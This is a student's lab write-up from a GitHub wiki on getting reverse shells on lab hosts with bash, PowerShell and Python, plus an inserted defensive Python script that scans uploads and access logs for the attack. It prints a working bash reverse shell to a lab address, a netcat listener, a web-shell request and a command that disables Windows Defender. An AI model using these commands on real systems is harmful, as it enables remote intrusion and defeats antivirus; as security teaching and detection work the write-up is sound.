Lab 8.2: Reverse Shells - morgan-hanrahan/Tech-Journal GitHub Wiki

Reverse Shells

Bash Shell

For a PHP bash reverse shell, I put the following command into a script file: /bin/bash -i >& /dev/tcp/10.0.99.39/4449 0>&1. Using an anonymous FTP server, I was first able to upload my bash reverse shell onto the server. From here I was able to run an nc listening session on port 4449 using nc -nlvp 4449. Once netcat was listening on the port, I navigated to the site 10.0.5.25/upload/fileTest.php?cmd=/bin/bash+mh2.sh. I found this to be the most challenging part of the lab. Originally, I had been working with a PHP file instead of a script file and encountered several issues. However, as soon as I switched, I found this section to be fairly easy.
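Seen from the defending side, both steps above leave artifacts: the uploaded script contains a /dev/tcp redirect, and the web server logs a request under /upload/ whose cmd parameter starts a shell. The following is an added example, not part of the original lab write-up, that checks for both; the Combined Log Format, the /upload/ prefix, the parameter-name list, the timestamps and the 10.0.5.7 client are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Bash's /dev/tcp/<host>/<port> pseudo-device, as used in the uploaded script.
DEV_TCP = re.compile(r"/dev/tcp/([0-9A-Za-z.\-]+)/(\d{1,5})")
# Query parameter names to treat as command carriers (assumed list).
CMD_PARAMS = {"cmd", "exec", "command"}
# A shell interpreter name or a .sh file appearing in the parameter value.
SHELL_HINT = re.compile(r"\b(?:ba|da|z)?sh\b")
# Combined Log Format: client, two idents, [time], "METHOD target PROTO", status.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def scan_upload(name, text):
    """Return (name, host, port) for every /dev/tcp redirect in an uploaded file."""
    return [(name, host, int(port)) for host, port in DEV_TCP.findall(text)]


def scan_access_log(lines, upload_prefix="/upload/"):
    """Flag requests under the upload directory whose query string runs a shell."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a log line in the assumed format
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.startswith(upload_prefix):
            continue
        # parse_qs decodes %xx escapes and turns '+' into a space.
        for key, values in parse_qs(url.query).items():
            for value in values:
                if key.lower() in CMD_PARAMS and SHELL_HINT.search(value):
                    hits.append((client, url.path, value, int(status)))
    return hits


# Constructed sample data modelled on the addresses and file names in this lab.
SAMPLE_UPLOAD = "/bin/bash -i >& /dev/tcp/10.0.99.39/4449 0>&1\n"
SAMPLE_LOG = [
    '10.0.99.39 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /upload/fileTest.php?cmd=/bin/bash+mh2.sh HTTP/1.1" 200 0',
    '10.0.99.39 - - [01/Jan/2024:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.5.7 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /upload/photo.png?cmd=resize HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(scan_upload("mh2.sh", SAMPLE_UPLOAD))
    print(scan_access_log(SAMPLE_LOG))
```

Only the first sample request is flagged; the third carries a cmd parameter under /upload/ but no shell name, which shows why the check combines path, parameter name and value rather than alerting on any one of them.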

PowerShell

Given the PowerShell reverse shell command, upon running it for the first time I was prompted with an error because of Windows Defender. To fix this, I simply turned off Windows Defender via PowerShell using Set-MpPreference -DisableRealtimeMonitoring $true. From here I was able to run netcat on my Kali machine and run the PowerShell command again on Windows. By doing this I was able to access the Windows machine on my Kali box. I found this section of the lab to be the easiest and encountered no issues.

Python

For the final section of this lab, I first researched various Python reverse shell scripts/one-liners. I was able to find a helpful GitHub, which I linked above, that contained the command I used. Once I gained access to sec335-rocky, I ran the Python reverse shell one-liner I found as my Kali box was listening on port 4449.